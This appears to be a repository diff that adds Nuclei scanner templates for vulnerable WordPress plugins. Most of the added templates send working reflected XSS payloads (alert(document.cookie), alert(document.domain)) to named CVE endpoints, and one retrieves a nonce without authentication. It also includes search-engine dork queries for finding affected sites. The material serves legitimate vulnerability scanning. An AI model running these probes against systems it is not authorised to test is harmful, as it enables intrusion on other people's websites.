20241222

date.txt

@@ -1 +1 @@
-20241221
+20241222

poc/auth/reactflow-session-replay-heatmap.yaml

@@ -0,0 +1,59 @@
+id: reactflow-session-replay-heatmap-38be705ad3ea6bee0782af8bbd1e1f3a
+
+info:
+  name: >
+    Reactflow Visitor Recording and Heatmaps <= 1.0.10 - Cross-Site Request Forgery to Reflected Cross-Site Scripting
+  author: topscoder
+  severity: medium
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/eb360c56-e144-4dc5-8bfb-715a014cb8e6?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/plugins/reactflow-session-replay-heatmap/"
+    google-query: inurl:"/wp-content/plugins/reactflow-session-replay-heatmap/"
+    shodan-query: 'vuln:'
+  tags: cve,wordpress,wp-plugin,reactflow-session-replay-heatmap,medium
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/reactflow-session-replay-heatmap/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "reactflow-session-replay-heatmap"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.0.10')

poc/aws/wp-migrate-2-aws.yaml

@@ -0,0 +1,59 @@
+id: wp-migrate-2-aws-e5583657ed5a9882a96eea1651f9a809
+
+info:
+  name: >
+    WP on AWS <= 5.2.1 - Reflected Cross-Site Scripting
+  author: topscoder
+  severity: medium
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/8c82dc37-0b9a-48c2-a8a6-fbee6182003f?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/plugins/wp-migrate-2-aws/"
+    google-query: inurl:"/wp-content/plugins/wp-migrate-2-aws/"
+    shodan-query: 'vuln:'
+  tags: cve,wordpress,wp-plugin,wp-migrate-2-aws,medium
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/wp-migrate-2-aws/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "wp-migrate-2-aws"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 5.2.1')

poc/cve/CVE-2014-4539-2356.yaml

@@ -0,0 +1,37 @@
+id: CVE-2014-4539
+
+info:
+  name: Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  reference: |
+    - https://wpscan.com/vulnerability/d6ea4fe6-c486-415d-8f6d-57ea2f149304
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-4539
+ 
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2014-4539
+    cwe-id: CWE-79
+  description: "Cross-site scripting (XSS) vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php."
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "'><script>alert(document.cookie)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

poc/cve/CVE-2021-24278-5668.yaml

@@ -0,0 +1,46 @@
+id: CVE-2021-24278
+
+info:
+  name: Redirection for Contact Form 7 < 2.3.4 - Unauthenticated Arbitrary Nonce Generation
+  author: 2rs3c
+  severity: high
+  description: In the Redirection for Contact Form 7 WordPress plugin before 2.3.4, unauthenticated users can use the wpcf7r_get_nonce AJAX action to retrieve a valid nonce for any WordPress action/function.
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24278
+    - https://wpscan.com/vulnerability/99f30604-d62b-4e30-afcd-b482f8d66413
+    - https://www.wordfence.com/blog/2021/04/severe-vulnerabilities-patched-in-redirection-for-contact-form-7-plugin/
+
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2021-24278
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/wp-admin/admin-ajax.php"
+
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+
+    body: "action=wpcf7r_get_nonce&param=wp_rest"
+
+    matchers-condition: and
+    matchers:
+
+      - type: status
+        status:
+          - 200
+
+      - type: regex
+        part: body
+        regex:
+          - '"success":true'
+          - '"nonce":"[a-f0-9]+"'
+        condition: and
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - '"nonce":"[a-f0-9]+"'

poc/cve/CVE-2021-24389-5729.yaml

@@ -0,0 +1,35 @@
+id: CVE-2021-24389
+
+info:
+  name: FoodBakery < 2.2 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  description: The WP Foodbakery WordPress plugin before 2.2, used in the FoodBakery WordPress theme before 2.2 did not properly sanitize the foodbakery_radius parameter before outputting it back in the response, leading to an unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability.
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24389
+  tags: cve,cve2021,wordpress,xss,wp-plugin
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2021-24389
+    cwe-id: CWE-79
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

poc/cve/CVE-2021-25120(1).yaml

@@ -0,0 +1,60 @@
+id: CVE-2021-25120
+
+info:
+  name: Easy Social Feed < 6.2.7 - Cross-Site Scripting
+  author: dhiyaneshDk
+  severity: medium
+  description: Easy Social Feed < 6.2.7 is susceptible to reflected cross-site scripting because the plugin does not sanitize and escape a parameter before outputting it back in an admin dashboard page, leading to it being executed in the context of a logged admin or editor.
+  remediation: |
+    Update to Easy Social Feed version 6.2.7 or later to mitigate the vulnerability.
+  reference:
+    - https://wpscan.com/vulnerability/6dd00198-ef9b-4913-9494-e08a95e7f9a0
+    - https://wpscan.com/vulnerability/0ad020b5-0d16-4521-8ea7-39cd206ab9f6
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-25120
+    - https://github.com/ARPSyndicate/cvemon
+    - https://github.com/ARPSyndicate/kenzer-templates
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2021-25120
+    cwe-id: CWE-79
+    epss-score: 0.00106
+    epss-percentile: 0.42122
+    cpe: cpe:2.3:a:easysocialfeed:easy_social_feed:*:*:*:*:pro:wordpress:*:*
+  metadata:
+    max-request: 2
+    vendor: easysocialfeed
+    product: easy_social_feed
+    framework: wordpress
+  tags: cve2021,cve,wordpress,wp-plugin,xss,authenticated,wpscan,easysocialfeed
+
+http:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+      - |
+        GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type=</script><script>alert(document.domain)</script> HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "'type' : '</script><script>alert(document.domain)</script>'"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+# digest: 4b0a00483046022100f3ce163f0a4245b48fadd091ce77fffda6474552e66006405db188add5f1336702210088a04491ecf1ec03bde9a145ed885d03c432c745e0df7266f322e4320502f4dd:922c64590222798bb761d5b6d8e72950

poc/cve/CVE-2022-0201(1).yaml

@@ -0,0 +1,51 @@
+id: CVE-2022-0201
+
+info:
+  name: WordPress Permalink Manager <2.2.15 - Cross-Site Scripting
+  author: Akincibor
+  severity: medium
+  description: |
+    WordPress Permalink Manager Lite and Pro plugins before 2.2.15 contain a reflected cross-site scripting vulnerability. They do not sanitize and escape query parameters before outputting them back in the debug page.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
+  remediation: |
+    Update to WordPress Permalink Manager version 2.2.15 or later to mitigate the vulnerability.
+  reference:
+    - https://wpscan.com/vulnerability/f274b0d8-74bf-43de-9051-29ce36d78ad4
+    - https://plugins.trac.wordpress.org/changeset/2656512
+    - https://github.com/ARPSyndicate/cvemon
+    - https://github.com/ARPSyndicate/kenzer-templates
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-0201
+    cwe-id: CWE-79
+    epss-score: 0.001
+    epss-percentile: 0.40882
+    cpe: cpe:2.3:a:permalink_manager_lite_project:permalink_manager_lite:*:*:*:*:*:wordpress:*:*
+  metadata:
+    max-request: 1
+    vendor: permalink_manager_lite_project
+    product: permalink_manager_lite
+    framework: wordpress
+  tags: cve,cve2022,wp-plugin,wpscan,xss,wordpress,permalink_manager_lite_project
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<img src onerror=alert(/XSS/)>'
+          - 'pm_query'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+# digest: 490a00463044022026f5edf6c9325db54e5dba0b0e39a8ad5fead51d43680b3a5a21b56c956d5c9202205b2e57c67c716336383fa1af54b8b29eec6b914edfbae42fbcbcc1f0f6e799aa:922c64590222798bb761d5b6d8e72950